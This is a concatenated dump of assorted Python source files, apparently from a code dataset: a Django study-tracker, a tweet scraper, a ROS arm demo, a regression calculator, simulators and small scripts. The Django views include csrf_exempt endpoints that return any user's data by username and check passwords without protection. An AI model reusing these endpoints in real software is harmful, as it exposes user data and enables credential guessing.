venture, date, 1, usage_type)\n return True\n\n\ndef get_usage_type():\n return UsageType.objects.get_or_create(\n symbol='san',\n defaults=dict(\n name='SAN',\n )\n )\n\n\n@plugin.register(chain='pricing', requires=['assets'])\ndef san(**kwargs):\n \"\"\"Updates the SAN usages from Ralph.\"\"\"\n usage_type, created = get_usage_type()\n date = kwargs['today']\n results = [update(d, date, usage_type) for d in api_pricing.get_fc_cards()]\n return (\n True,\n 'SAN usages updated:{} (total: {})'.format(sum(results), len(results)),\n kwargs\n )\n","sub_path":"src/ralph_pricing/plugins/collects/san.py","file_name":"san.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"75591757","text":"from convert import Convert\nfrom pyperclip import paste, copy\nfrom keyboard import add_hotkey, press_and_release, wait\nfrom sys import exit\n\nclass Changer:\n\n\tdef __init__(self, hotkey):\n\n\t\tadd_hotkey(hotkey, Changer.change_symbols)\n\n\t@staticmethod\n\tdef change_symbols():\n\t\t\n\t\tpress_and_release('ctrl+c')\n\n\t\tclipboard = Convert.convert_symbols(paste())\n\n\t\tif clipboard is None:\n\t\t\treturn\n\n\t\tcopy(clipboard)\n\t\tpress_and_release('ctrl+v')\n\n\t@staticmethod\n\tdef start():\n\n\t\twait()\n\nif __name__ == '__main__':\n\n\ttry:\n\t\tHOTKEY = 'ctrl+b'\n\t\tChanger(HOTKEY).start()\n\texcept (KeyboardInterrupt, SystemExit):\n\t\texit()\n","sub_path":"layout_changer.py","file_name":"layout_changer.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"131270865","text":"import tweepy\nfrom tweepy import OAuthHandler\nfrom twitter_API_credentials import *\n\nouttweets = []\n\ndef getTweets(screen_name):\n\t#OAuth interface\n\tauth = OAuthHandler(consumer_key,consumer_secret)\n\tauth.set_access_token(access_key,access_secret)\n\tapi=tweepy.API(auth)\n\n\t#Gather all tweets\n\ttweets = []\n\tnewTweets = api.user_timeline(screen_name = screen_name,count=500)\n\ttweets.extend(newTweets)\n\toldest = tweets[-1].id - 1\n\tcount = 0\n\n\twhile len(newTweets) > 0:\n\t\t#all subsiquent requests use the max_id param to prevent duplicates\n\t\tnewTweets = api.user_timeline(screen_name = screen_name,count=500,max_id=oldest)\n\t\t\n\t\t#save most recent tweets\n\t\ttweets.extend(newTweets)\n\t\t\n\t\t#update the id of the oldest tweet less one\n\t\toldest = tweets[-1].id - 1\n\t\t\n\t\tprint(\"Getting \"+ str(count)+\" Tweets\")\n\t\tcount = count + 1;\n\n\touttweets = [tweet.text.encode(\"utf-8\") for tweet in tweets]\n\tstoreTweets = open('gems.txt', 'w')\n\n\tfor item in outtweets:\n \t\tstoreTweets.write(\"%s\\n\" % item)\n\nif __name__ == '__main__':\n\tgetTweets(\"realDonaldTrump\")\n\n\t\n","sub_path":"tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"308983449","text":"num = '8461'\nmult = 1\nresult = [int(index) for index in num]\nresult.reverse()\nprint (result)\nresult.sort()\nprint (result)\nfor i in range(1, 4):\n mult *= result[i]\nprint (mult)","sub_path":"homework_task2.py","file_name":"homework_task2.py","file_ext":"py","file_size_in_byte":178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"419586438","text":"from django.shortcuts import render, redirect, render_to_response\nfrom django.http import 
HttpResponse\nfrom .forms import UserLoginForm, CreateUserForm, StatisticsWriteForm\nfrom django.contrib.auth.models import User\nfrom django.template.context_processors import csrf\nfrom .util.time import getmonthdays, gettoday, getmonth, getyear, str_yearnow, get_weeks_date, fdstr\nfrom .models import UserStudyData\nfrom .util.modelmanage import DBManager\nfrom .util.statistics import calc_study_time, calc_week_data, calc_week_top_data, calc_lastweek_data, calc_average_data, calc_average_hour_data, calc_getlabel, calc_average_month_data\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom datetime import date\n\nfrom django.contrib.auth import (\n\tauthenticate, get_user_model, login, logout\n)\n\n# Create your views here.\ndef index(request):\n calc_week_data(request.user.username)\n return render(request, 'elections/index.html')\n\ndef statistics(request):\n return render(request, 'elections/statistics.html')\n\n\n# ======================================================================================================= #\n\n# View showing math statistics\ndef statisticsview_math(request):\n week_days = get_weeks_date(0)\n calc_week = calc_week_data(request.user.username)\n top_d = calc_week_top_data(request.user.username, 'math')\n lastweek = calc_lastweek_data(request.user.username)\n average = calc_average_data(request.user.username, 'math')\n h_average = calc_average_hour_data(request.user.username, 'math')\n label = calc_getlabel(average)\n if calc_week['nonecount'] == 7:\n top_d[0] = 10\n\n cont = {'weekdays': week_days, 'calcweek': calc_week, 'topdata': top_d, 'increment': top_d[0]/10, 'lastweek': lastweek, 'average': average, 'h_average': h_average\n , 'label': label}\n return render(request, 'elections/viewstatistics_math.html', cont)\n\n# View showing science statistics\ndef statisticsview_science(request):\n week_days = get_weeks_date(0)\n calc_week = calc_week_data(request.user.username)\n top_d = calc_week_top_data(request.user.username, 'science')\n lastweek = calc_lastweek_data(request.user.username)\n average = calc_average_data(request.user.username, 'science')\n h_average = calc_average_hour_data(request.user.username, 'science')\n label = calc_getlabel(average)\n if calc_week['nonecount'] == 7:\n top_d[0] = 10\n\n cont = {'weekdays': week_days, 'calcweek': calc_week, 'topdata': top_d, 'increment': top_d[0]/10, 'lastweek': lastweek, 'average': average, 'h_average': h_average\n , 'label': label}\n return render(request, 'elections/viewstatistics_science.html', cont)\n\ndef statisticsview_korean(request):\n week_days = get_weeks_date(0)\n calc_week = calc_week_data(request.user.username)\n top_d = calc_week_top_data(request.user.username, 'korean')\n lastweek = calc_lastweek_data(request.user.username)\n average = calc_average_data(request.user.username, 'korean')\n h_average = calc_average_hour_data(request.user.username, 'korean')\n label = calc_getlabel(average)\n if calc_week['nonecount'] == 7:\n top_d[0] = 10\n\n cont = {'weekdays': week_days, 'calcweek': calc_week, 'topdata': top_d, 'increment': top_d[0]/10, 'lastweek': lastweek, 'average': average, 'h_average': h_average\n , 'label': label}\n return render(request, 'elections/viewstatistics_korean.html', cont)\n\ndef statisticsview_english(request):\n week_days = get_weeks_date(0)\n calc_week = calc_week_data(request.user.username)\n top_d = calc_week_top_data(request.user.username, 'english')\n lastweek = calc_lastweek_data(request.user.username)\n 
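# --- Illustrative sketch (not part of the views.py record above) ---
# The four statisticsview_* functions in this file differ only in the subject
# string ('math', 'science', 'korean', 'english') and the template name, so
# they could collapse into one parameterized helper. A hedged sketch that
# relies on the same calc_* helpers and render imported in this file;
# 'statisticsview' and 'subject' are hypothetical names introduced here:
def statisticsview(request, subject):
    week_days = get_weeks_date(0)
    calc_week = calc_week_data(request.user.username)
    top_d = calc_week_top_data(request.user.username, subject)
    lastweek = calc_lastweek_data(request.user.username)
    average = calc_average_data(request.user.username, subject)
    h_average = calc_average_hour_data(request.user.username, subject)
    label = calc_getlabel(average)
    if calc_week['nonecount'] == 7:
        top_d[0] = 10
    cont = {'weekdays': week_days, 'calcweek': calc_week, 'topdata': top_d,
            'increment': top_d[0]/10, 'lastweek': lastweek, 'average': average,
            'h_average': h_average, 'label': label}
    return render(request, 'elections/viewstatistics_{}.html'.format(subject), cont)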
average = calc_average_data(request.user.username, 'english')\n h_average = calc_average_hour_data(request.user.username, 'english')\n label = calc_getlabel(average)\n if calc_week['nonecount'] == 7:\n top_d[0] = 10\n\n cont = {'weekdays': week_days, 'calcweek': calc_week, 'topdata': top_d, 'increment': top_d[0]/10, 'lastweek': lastweek, 'average': average, 'h_average': h_average\n , 'label': label}\n return render(request, 'elections/viewstatistics_english.html', cont)\n\ndef statisticsview_all(request):\n calc_month = calc_average_month_data(request.user.username)\n return render(request, 'elections/viewstatistics_all.html', {'calcmonth': calc_month})\n\n# ======================================================================================================= #\n\n# View for updating study records on the calendar\ndef statisticscalendar(request):\n days = getmonthdays()\n cont = {'days': days, 'today': gettoday(), 'month': getmonth(), 'year': getyear()}\n return render_to_response('elections/statisticscalender.html', cont)\n\n# ======================================================================================================= #\n\n# View that processes the values received from the input form\ndef statisticsform(request):\n form = StatisticsWriteForm(request.POST or None)\n\n if form.is_valid():\n dm = DBManager()\n query = dm.getusertodaydata(request.user.username)\n math = form.cleaned_data.get('math')\n m_math = form.cleaned_data.get('m_math')\n\n korean = form.cleaned_data.get('korean')\n m_korean = form.cleaned_data.get('m_korean')\n\n science = form.cleaned_data.get('science')\n m_science = form.cleaned_data.get('m_science')\n\n english = form.cleaned_data.get('english')\n m_english = form.cleaned_data.get('m_english')\n # if the query exists, update the data; otherwise create it\n if query.exists():\n query.update(mathhour=calc_study_time(math, m_math), koreanhour=calc_study_time(korean, m_korean), sciencehour=calc_study_time(science, m_science),\n englishhour=calc_study_time(english, m_english))\n return render(request, 'elections/statistics.html')\n else:\n model_study_data = UserStudyData(date=str_yearnow(),name=request.user.username, mathhour=calc_study_time(math, m_math), koreanhour=calc_study_time(korean, m_korean),\n englishhour=calc_study_time(english, m_english), sciencehour=calc_study_time(science, m_science))\n model_study_data.save()\n return render(request, 'elections/statistics.html')\n\n return render(request, 'elections/statisticsform.html', {'form' : form})\n\ndef signup(request):\n form = CreateUserForm(request.POST or None)\n if request.user.is_authenticated:\n return redirect('index')\n\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password1')\n c_password = form.cleaned_data.get('password2')\n\n existsID = User.objects.filter(username=username).exists()\n\n if password == c_password and existsID is False:\n form.signup()\n else:\n content = {'form' : form, 'error' : \"이미 가입된 아이디 이거나 비밀번호 재확인을 해주세요\"}\n content.update(csrf(request))\n return render_to_response('elections/register.html', content)\n return redirect('index')\n\n return render(request, 'elections/register.html', {'form': form})\n\n\ndef login_view(request):\n form = UserLoginForm(request.POST or None)\n cont = {}\n if request.user.is_authenticated:\n return redirect('index')\n\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return 
redirect('index')\n else:\n cont['form'] = form\n cont['error'] = 'Login failed!'\n cont.update(csrf(request))\n return render_to_response('elections/login.html', cont)\n else:\n try:\n username = form.cleaned_data.get('username')\n existsID = User.objects.filter(username=username).exists()\n\n if existsID is False:\n cont['form'] = form\n cont['error'] = '가입되지 않은 회원입니다!'\n cont.update(csrf(request))\n return render_to_response('elections/login.html', cont)\n except:\n return render(request, 'elections/login.html', {\"form\": form, \"title\": 'Login'})\n\n return render(request, 'elections/login.html', {\"form\": form, \"title\": 'Login'})\n\n# ======================================================================================================= #\n\n# Java API integration (csrf token)\n\n# Response user all data\n# @return dict\n@csrf_exempt\ndef response_user_data(request):\n username = request.POST['username']\n db = DBManager()\n data = db.get_dict_userdata(username=username)\n\n return JsonResponse(data)\n\n# Response user data filter\n# @return dict\n@csrf_exempt\ndef response_user_cond_data(request):\n username = request.POST['username']\n year = request.POST['year']\n month = request.POST['month']\n day = request.POST['day']\n\n db = DBManager()\n dict_data = db.get_dict_userdata_cond(username, year, month, day)\n\n return JsonResponse(dict_data)\n\n# Response user id&password registered check\n# @return boolean\n@csrf_exempt\ndef response_user_valid(request):\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(username=username, password=password)\n\n if user is not None:\n return JsonResponse({'valid': True })\n\n return JsonResponse({'valid': False})\n\n# Response user week statistics\n# return dict\n@csrf_exempt\ndef response_user_statistics_week(request):\n username = request.POST['username']\n\n calcweek = calc_week_data(username=username)\n return JsonResponse(calcweek)\n\n# Response user average month statistics\n# return dict\n@csrf_exempt\ndef response_user_statistics_month(request):\n username = request.POST['username']\n\n calcmonth = calc_average_month_data(username=username)\n return JsonResponse(calcmonth)\n\n","sub_path":"elections/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"97540566","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport re\n\nimport telebot\nfrom telebot import types\n\nimport datetime\n\nimport commands,ApiManager,mirror\n\nfrom datetimeManager import get_week_number,get_day\n\nwith open('botconfig') as f:\n\tAPI_TOKEN = f.read().replace('\\n','')\n\nbot = telebot.TeleBot(API_TOKEN)\n\ndatabase = \"database.txt\"\n\nuser_dict = {}\n\nemployee_name = []\n\ndelta = [0]\n\n\nclass User:\n def __init__(self, department=\"\", identificator=\"\"):\n self.department = department\n self.identificator = identificator\n def save(self, chat_id):\n user_dict[chat_id] = self\n with open(database,\"a\") as f:\n f.write(\"{0}####{1}####{2}\\n\".format(chat_id, self.department, self.identificator))\n\n\ndef read_users(file):\n try:\n with open(file) as f:\n for line in f.readlines():\n chat_id, department, identificator = line[:-1].split(\"####\")\n user_dict[int(chat_id)] = User(department=department, identificator=identificator)\n except:\n f = open(file,\"w\")\n f.close()\n \n\n# Handle '/start' and '/help'\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message):\n 
chat_id = message.chat.id\n \n hi_message = \"Привет!\\nДля просмотра рассписания используйте комманду /show\\nНо для начала нужно представиться, используйте комманду /hi\"\n \n bot.send_message(chat_id, hi_message)\n\n\n@bot.message_handler(commands=['hi'])\ndef send_welcome(message):\n try:\n msg = bot.reply_to(message, \"Представьтесь, напишите вашу группу либо Фамилию Имя?\")\n bot.register_next_step_handler(msg, process_search_step)\n except Exception as e:\n print(e)\n \n \ndef process_search_step(message):\n try:\n chat_id = message.chat.id\n text = message.text\n \n if text in ApiManager.getGroupsList():\n user = User(department='group',identificator=text)\n user.save(chat_id)\n bot.reply_to(message, \"Группа найдена. Можете смотреть рассписание. (/show)\")\n return\n employees = ApiManager.getEmployeesList()\n for identificator, employee in employees:\n if employee == text:\n user = User(department='employee',identificator=identificator)\n user.save(chat_id)\n bot.reply_to(message, \"Преподаватель найден. Можете смотреть рассписание. (/show)\")\n return\n \n for identificator, employee in employees:\n if re.search(text.lower(),employee.lower()):\n bot.reply_to(message, \"Быть может это {0} ?\\\n да/нет?\".format(employee))\n employee_name.append(identificator)\n bot.register_next_step_handler(message, process_employee_step)\n break\n else:\n bot.reply_to(message, \"Ничего не нашли.\")\n except Exception as e:\n print(e)\n\n\ndef process_employee_step(message):\n chat_id = message.chat.id\n text = message.text\n if text==\"да\" or text==\"Да\":\n user = User(department='employee',identificator=employee_name.pop())\n user.save(chat_id)\n bot.reply_to(message, \"Запомнили. Можете смотреть рассписание. (/show)\")\n return\n else:\n bot.reply_to(message, \"Попробуйте поискать ещё раз.\")\n return\n\n\n@bot.message_handler(commands=['show'])\ndef today_schedule(message):\n try:\n chat_id = message.chat.id\n user = user_dict[chat_id]\n delta[0]=0\n resend(message)\n except Exception as e:\n bot.send_message(chat_id, \"Вы забыли представится, используйте комманду /hi\")\n\n\ndef resend(message):\n chat_id = message.chat.id\n user = user_dict[chat_id]\n \n if message.text not in ('/show','вчера','завтра'):\n delta[0]=0\n markup = types.ReplyKeyboardHide(selective=False)\n bot.send_message(chat_id, \"Окей :)\", reply_markup=markup)\n return\n if message.text=='вчера':\n delta[0]-=1\n elif message.text=='завтра':\n delta[0]+=1\n if message.text:\n if user.department == 'group':\n msg = commands.schedule_to_string(user,datetime.date.today() + datetime.timedelta(days=delta[0]))\n elif user.department == 'employee':\n msg = commands.schedule_to_string(user,datetime.date.today() + datetime.timedelta(days=delta[0]))\n else:\n msg = [\"Заполните информацию о себе\"]\n for m in msg:\n bot.send_message(chat_id, m)\n markup = types.ReplyKeyboardMarkup()\n itembtn1 = types.KeyboardButton('вчера')\n itembtn2 = types.KeyboardButton('хватит')\n itembtn3 = types.KeyboardButton('завтра')\n markup.row(itembtn1,itembtn3)\n markup.row(itembtn2)\n bot.send_message(chat_id, \"Хотите ещё?\", reply_markup=markup)\n bot.register_next_step_handler(message, resend)\n markup = types.ReplyKeyboardHide(selective=False)\n\nread_users(database)\nbot.polling()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"565937531","text":"import xlrd\nimport datetime\nimport 
test_data_inputpath\nimport common_login\n\n\nclass FormExcelRead(common_login.CommonLogin):\n def __init__(self):\n self.start_date_time = datetime.datetime.now()\n super(FormExcelRead, self).__init__()\n\n # ------------- file reader index -------------------\n workbook = xlrd.open_workbook(test_data_inputpath.crpo_test_data_file['create_form'])\n if self.login_server == 'betaams':\n self.form_sheet1 = workbook.sheet_by_index(0)\n if self.login_server == 'ams':\n self.form_sheet1 = workbook.sheet_by_index(0)\n if self.login_server == 'amsin':\n self.form_sheet1 = workbook.sheet_by_index(1)\n\n # --------------- Value initialization ----------------\n self.xl_candidate_name = []\n self.xl_date_time = []\n self.xl_college = []\n self.xl_gender = []\n self.xl_country = []\n self.xl_address = []\n self.xl_birth_date = []\n self.xl_current_time = []\n self.xl_python_tutorial = []\n self.xl_java_tutorial = []\n\n # ------------- Iterate Excel sheet------------------------\n self.event_excel_read()\n\n def event_excel_read(self):\n # --------------------------------------candidate details-------------------------------------------------------\n for i in range(1, self.form_sheet1.nrows):\n number = i # Counting number of rows\n rows = self.form_sheet1.row_values(number)\n\n if rows[0]:\n self.xl_candidate_name.append(rows[0])\n if rows[1]:\n self.xl_date_time.append(rows[1])\n if rows[2]:\n self.xl_college.append(str(rows[2]))\n if rows[3]:\n self.xl_gender.append(str(rows[3]))\n if rows[4]:\n self.xl_country.append(str(rows[4]))\n if rows[5]:\n self.xl_address.append(str(rows[5]))\n if rows[6]:\n self.xl_birth_date.append(str(rows[6]))\n if rows[7]:\n self.xl_current_time.append(str(rows[7]))\n if rows[8]:\n self.xl_python_tutorial.append(str(rows[8]))\n if rows[9]:\n self.xl_java_tutorial.append(str(rows[9]))\n","sub_path":"scripts/embrace/form_creation/create_form_excel.py","file_name":"create_form_excel.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384574893","text":"#! 
coding:utf-8\n\nimport sys\nimport time\nimport random\n\nimport rospy\n\nfrom std_msgs.msg import String\nfrom mal_msgs.msg import (\n ArmServoMovement,\n LegServoMovement,\n Movement\n )\n\nclass DemobehaviorArm(object):\n\n ARM_SERVO_TOPIC = \"/mal_control/control_arm_servo\"\n LEG_SERVO_TOPIC = \"/mal_control/control_leg_servo\"\n MOVEMENT_TOPIC = \"/mal_control/command\"\n\n def __init__(self, node_name=\"demobehavior_arm\", fps=30):\n rospy.init_node(node_name)\n self.r = rospy.Rate(fps)\n\n self.arm_pub = rospy.Publisher(self.ARM_SERVO_TOPIC, ArmServoMovement, queue_size=10)\n self.leg_pub = rospy.Publisher(self.LEG_SERVO_TOPIC, LegServoMovement, queue_size=10)\n self.move_pub = rospy.Publisher(self.MOVEMENT_TOPIC, Movement, queue_size=10)\n \n def main(self):\n\n mov = [Movement.FRONT, Movement.FRONT_LEFT, Movement.FRONT_RIGHT, Movement.BACK, Movement.BACK_LEFT, Movement.BACK_RIGHT, Movement.ROLL_RIGHT, Movement.ROLL_LEFT, Movement.STOP]\n mov_count = 0\n while not rospy.is_shutdown():\n \n arm_order = ArmServoMovement()\n isMoveArm = random.randint(0, 100)\n if isMoveArm < 100:\n\n rospy.loginfo(\"==================== Arm Moving\")\n \n arm_order.servo_num = random.randint(0, 2)\n\n movement = random.randint(0, 2)\n\n if movement == 0:\n arm_order.movement = ArmServoMovement.FORWARD\n\n if movement == 1:\n arm_order.movement = ArmServoMovement.BACK\n\n if movement == 2:\n arm_order.movement = ArmServoMovement.STOP\n\n rospy.loginfo(arm_order)\n\n self.arm_pub.publish(arm_order)\n self.r.sleep()\n else:\n arm_order.movement = ArmServoMovement.STOP\n self.arm_pub.publish(arm_order)\n \n #self.r.sleep()\n\n time.sleep(random.randint(0, 3))\n \n \nif __name__ == '__main__':\n dh = DemobehaviorArm()\n dh.main()\n","sub_path":"src/mal_decision_making/demobehavior_arm.py","file_name":"demobehavior_arm.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"205764973","text":"from tkinter import *\nfrom math import floor\nimport sys\nimport graph\nimport user_input\nimport re\n\n\"\"\"The meat of the program -- the calculator. Handles all the mathematical\noperations involved in computing a linear regression. 
Modularizes the steps \nand parts of the computation into smaller functions that are all called\nin sequence in the a conglomerate method: calculate, which also computes the\ncrucial values of m and b, thus acquiring the equation for the regression line.\n\nAlso contains methods for finding the max and min x and y values.\"\"\"\nclass Calculator:\n\t\"\"\"Set up the data to be processed and used for calculations.\"\"\"\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.x = []\n\t\tself.y = []\n\t\tfor elem in data:\n\t\t\tself.x.append(elem[0])\n\t\t\tself.y.append(elem[1])\n\n\t\"\"\"Find all necessary values and using it, compute the value of m and b.\"\"\"\n\tdef calculate(self):\n\t\tN = self.N()\n\t\tprint(\"N: \" + str(N))\n\t\txtotal = self.xsum()\n\t\tprint(\"xtotal: \" + str(xtotal))\n\t\tytotal = self.ysum()\n\t\tprint(\"ytotal: \" + str(ytotal))\n\t\txytotal = self.xysum()\n\t\tprint(\"xytotal: \" + str(xytotal))\n\t\tx2total = self.x2sum()\n\t\tprint(\"x2total: \" + str(x2total))\n\t\ty2total = self.y2sum()\n\t\tprint(\"y2total: \" + str(y2total))\n\n\t\tm = ((N * xytotal) - (xtotal * ytotal))/((N * x2total) - (xtotal * xtotal))\n\t\t#print(\"m: \" + str(m))\n\n\t\tb = ((x2total * ytotal) - (xtotal * xytotal))/((N * x2total) - (xtotal * xtotal))\n\t\t#print(\"b: \" + str(b))\n\n\t\treturn m, b\n\n\t\"\"\"Define the line using our values for m and b -- output a value given an input.\"\"\"\n\tdef line(self, m, b, x):\n\t\ty = m * x + b\n\n\t\treturn y\n\n\t\"\"\"Compute the sum of all x.\"\"\"\n\tdef xsum(self):\n\t\txtotal = 0\n\t\tfor elem in self.x:\n\t\t\txtotal += float(elem)\n\t\treturn xtotal\n\n\t\"\"\"Compute the sum of all y\"\"\"\n\tdef ysum(self):\n\t\tytotal = 0\n\t\tfor elem in self.y:\n\t\t\tytotal += float(elem)\n\t\treturn ytotal\n\n\t\"\"\"Compute the sum of x*y\"\"\"\n\tdef xysum(self):\n\t\txytotal = 0\n\t\txy = []\n\t\tfor elem in self.data:\n\t\t\txy.append(float(elem[0]) * float(elem[1])) #compute x * y for a given pair\n\n\t\tfor elem in xy:\n\t\t\txytotal += elem #sum the values found before.\n\n\t\treturn xytotal\n\n\t\"\"\"Compute the sum of x squared.\"\"\"\n\tdef x2sum(self):\n\t\tx2total = 0\n\t\tfor elem in self.x:\n\t\t\t#print(float(elem) ** 2)\n\t\t\tx2total += float(elem) ** 2\n\t\treturn x2total\n\n\t\"\"\"Compute the sum of y squared.\"\"\"\n\tdef y2sum(self):\n\t\ty2total = 0\n\t\tfor elem in self.y:\n\t\t\ty2total += float(elem) ** 2\n\t\treturn y2total\n\n\t\"\"\"Compute N (number of data points)\"\"\"\n\tdef N(self):\n\t\tif len(self.data) == 0:\n\t\t\tprint(\"There is no data\")\n\t\t\tsys.exit(0)\n\t\treturn len(self.data)\n\n\t\"\"\"Compute max X value.\"\"\"\n\tdef getMaxX(self):\n\t\tmax = 0\n\t\tfor elem in self.x:\n\t\t\tif float(elem) > max:\n\t\t\t\tmax = float(elem)\n\n\t\treturn max\n\n\t\"\"\"Compute max Y value.\"\"\"\n\tdef getMaxY(self):\n\t\tmax = 0\n\t\tfor elem in self.y:\n\t\t\tif float(elem) > max:\n\t\t\t\tmax = float(elem)\n\n\t\treturn max\n\n\t\"\"\"Compute min X value\"\"\"\n\tdef getMinX(self):\n\t\tmin = float(self.x[0])\n\t\tfor elem in self.x:\n\t\t\tif float(elem) < min:\n\t\t\t\tmin = float(elem)\n\n\t\treturn min\n\n\t\"\"\"Compute min Y value\"\"\"\n\tdef getMinY(self):\n\t\tmin = float(self.x[0])\n\t\tfor elem in self.y:\n\t\t\tif float(elem) < min:\n\t\t\t\tmin = float(elem)\n\t\t\t\tprint(min)\n\n\t\treturn min\n\n\"\"\"Function for finding the ratio as described in the explanation of the plotting \n\talgorithm found in graph.py.\"\"\"\ndef ratioCalc(x, y, xLimit, yLimit):\n\tratioX = 
x/xLimit\n\tratioY = y/yLimit\n\n\treturn ratioX, ratioY\n\n\"\"\"Main function. Drives the program.\"\"\"\ndef main():\n\troot = Tk() #establish tkinter root.\n\n\tinp = user_input.Input(root) #pass in the root, initialize input.\n\t#root.mainloop() \t\t \t #start the mainloop.\n\tcontents = inp.getContents() #grab the contents.\n\n\tpar = user_input.Parser(contents) #Parse the input.\n\tdata = par.extract() #extract the data from it.\n\n\tcalc = Calculator(data) #calculate using the found data.\n\tm, b = calc.calculate()\n\tprint(\"m: \" + str(m))\n\tprint(\"b: \" + str(b))\n\t\n\n\n\troot2 = Tk() #get second root for plotting.\n\n\tout = graph.output(root2)\n\tout.insertDataText1(contents, calc.N(), m, b)\n\tout.insertDataText2(calc.xsum(), calc.ysum(), \n\t\tcalc.x2sum(), calc.y2sum(), calc.xysum())\n\tout.drawEqn(m, b)\n\tout.drawAxes()\n\tmaxY = calc.getMaxY()\n\tmaxX = calc.getMaxX()\n\tminY = calc.getMinY()\n\tminX = calc.getMinX()\n\tout.labelAxes(maxY, maxX) #grab necessary values and set up the graph.\n\n\tplotX1 = minX\n\tplotY1 = calc.line(m, b, plotX1)\n\tplotX2 = maxX\n\tplotY2 = calc.line(m, b, plotX2)\n\t#find necessary points.\n\tratioX1, ratioY1 = ratioCalc(plotX1, plotY1, maxX, maxY) #find ratios.\n\tratioX2, ratioY2 = ratioCalc(plotX2, plotY2, maxX, maxY)\n\n\tout.drawLine(ratioX1, ratioY1, ratioX2, ratioY2) #draw line\n\tout.drawPoints(data, maxX, maxY) #draw points.\n\n\troot2.mainloop()\n\nif __name__ == '__main__':\n\tmain()","sub_path":"regcalc.py","file_name":"regcalc.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545900898","text":"n, m = [int(x) for x in input().split()]\na = []\nfor _ in range(n):\n a.append(list(str(input())))\n\nvisited = [[0 for i in range(m)] for j in range(n)]\n\nans = []\nfor i in range(n):\n for j in range(m):\n if a[i][j]=='*':\n x = 1\n while 1:\n if i + x < n and j + x < m and i - x > -1 and j - x > -1:\n if a[i+x][j]=='*' and a[i-x][j]=='*' and a[i][j+x]=='*' and a[i][j-x]=='*':\n visited[i][j+x] = 1\n visited[i][j-x] = 1\n visited[i-x][j] = 1\n visited[i+x][j] = 1\n visited[i][j] = 1\n x += 1\n else:\n break\n else:\n break\n if x>1:\n ans.append([i, j, x-1])\n\nfor i in range(n):\n for j in range(m):\n if a[i][j]=='*' and visited[i][j] == 0:\n print( -1)\n exit(0)\n\nprint( len(ans))\nfor i in ans:\n for j in i[:-1]:\n print( j+1,end=\" \")\n print (i[-1], end=\" \")\n print()","sub_path":"CodeForces/501__3_E_star_drawing_easy.py","file_name":"501__3_E_star_drawing_easy.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"462769539","text":"import cv2 as cv\nimport os\n\npath = os.getcwd()\nname = 'Meqdad'\ncam = cv.VideoCapture(0)\nimg_counter = 0\n\nwhile True:\n is_success, frame = cam.read()\n if not is_success:\n print(\"failed to capture image.\")\n break\n cv.imshow(\"Collecting Data by pressing space\", frame)\n\n k = cv.waitKey(1)\n\n # Check if ESC is pressed\n if k%256 == 27:\n print(\"Press ESC to close...\")\n break\n\n # Check if space is pressed\n elif k%256 == 32:\n img_name = f\"{path}/CollectedData/{name}_img_{img_counter}.jpg\"\n cv.imwrite(img_name, frame)\n print(f\"Image #{img_counter} saved!\")\n img_counter += 1\n\ncam.release()\ncv.destroyAllWindows()","sub_path":"Face 
Detection/1-collect_data.py","file_name":"1-collect_data.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"173317334","text":"__author__ = 'vialette'\n\n# non-reconfigurable simulator\nimport ultrastorage.simulator.nonreconfigurable as nonreconfigurable\n\n# insertion politics\nimport ultrastorage.inserter as inserter\n\n# storage system\nimport ultrastorage.storagesystem as storagesystem\n\n# item generator\nimport ultrastorage.itemgenerator as itemgenerator\n\n# timout generator\nimport ultrastorage.timeoutgenerator as timeoutgenerator\n\n# timed item generator\nimport ultrastorage.timeditemgenerator as timeditemgenerator\n\n#from ultrastorage.tools import terrabyte\n\nimport simpy\nenvironment = simpy.Environment()\n\nname = \"myStorageSystem\"\nnumber_of_storage_units = 5\ncapacity = 10000000\ncpu = 2\ntransfer_time_manager = storagesystem.transfertimemanager.Ethernet()\nstorage_system = storagesystem.homogeneous_storage_system_builder(environment,\n number_of_storage_units,\n capacity,\n cpu,\n transfer_time_manager,\n name=name)\nprint(storage_system)\n\n\nsimulator = nonreconfigurable.Overflow(storage_system, inserter.Roundabout)\n\n# our item generator\nitem_generator = itemgenerator.VU2005()\ntimeout_generator = timeoutgenerator.Exponential(10)\ntimed_item_generator = timeditemgenerator.TimedItemGenerator(item_generator, timeout_generator)\nenvironment.process(timed_item_generator.run(environment, simulator))\n\nsimulator.run(environment)\n#\n#\nprint(\"number of generated items={}\".format(timed_item_generator.number_of_items()))\nprint(\"numberof items in the storage 